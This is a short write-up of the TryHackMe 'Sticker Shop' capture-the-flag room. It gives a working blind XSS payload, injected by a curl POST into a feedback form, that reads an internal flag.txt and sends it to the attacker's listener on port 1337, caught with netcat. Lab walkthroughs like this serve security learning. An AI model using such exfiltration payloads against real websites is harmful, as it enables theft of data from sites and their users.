TryHackMe - The Sticker Shop Writeup

‘The Sticker Shop’ is one of the ‘Easy’ difficulty rooms in THM.

We seem to have been given enough clues. Once I’ve done enough exploring, I decide on the path to follow. We get an error when we advance to the page.

It seems to be the only area where we can get interaction.

http://machine-ip:8080/submit_feedback

In this section, it is noticed that when an input is given to the textbox, it always returns the same thing in response.

Since we need to somehow read the contents of the flag.txt file and we are faced with an input field, the first thing that comes to my mind is to write a script that will make things easier.

You can do this XSS experiment without using the curl command, but I want to run it from the terminal.

I gather the information I need and create my curl command.

Script -> "><script>fetch('http://127.0.0.1:8080/flag.txt').then(r=>r.text()).then(d=>fetch(`http://tun0-ip:1337/?flag=${d}`))</script>

Command -> curl -k -X POST 'http://machine-ip:8080/submit_feedback' --data-urlencode "feedback=>\"<script>fetch('http://127.0.0.1:8080/flag.txt').then(r=>r.text()).then(d=>fetch('http://tun0-ip:1337/?flag='+d))</script>\""

We prepare our terminals before we start the final processes. After starting a listen with NC, I use the curl command and look what happens in a few seconds on the listening terminal!

You can decode the resulting flag and then use it.

I hope I have not made any spelling mistakes or misinformation. Please let me know if you notice any omissions or errors.

For suggestions and questions, you can reach me on LinkedIn&X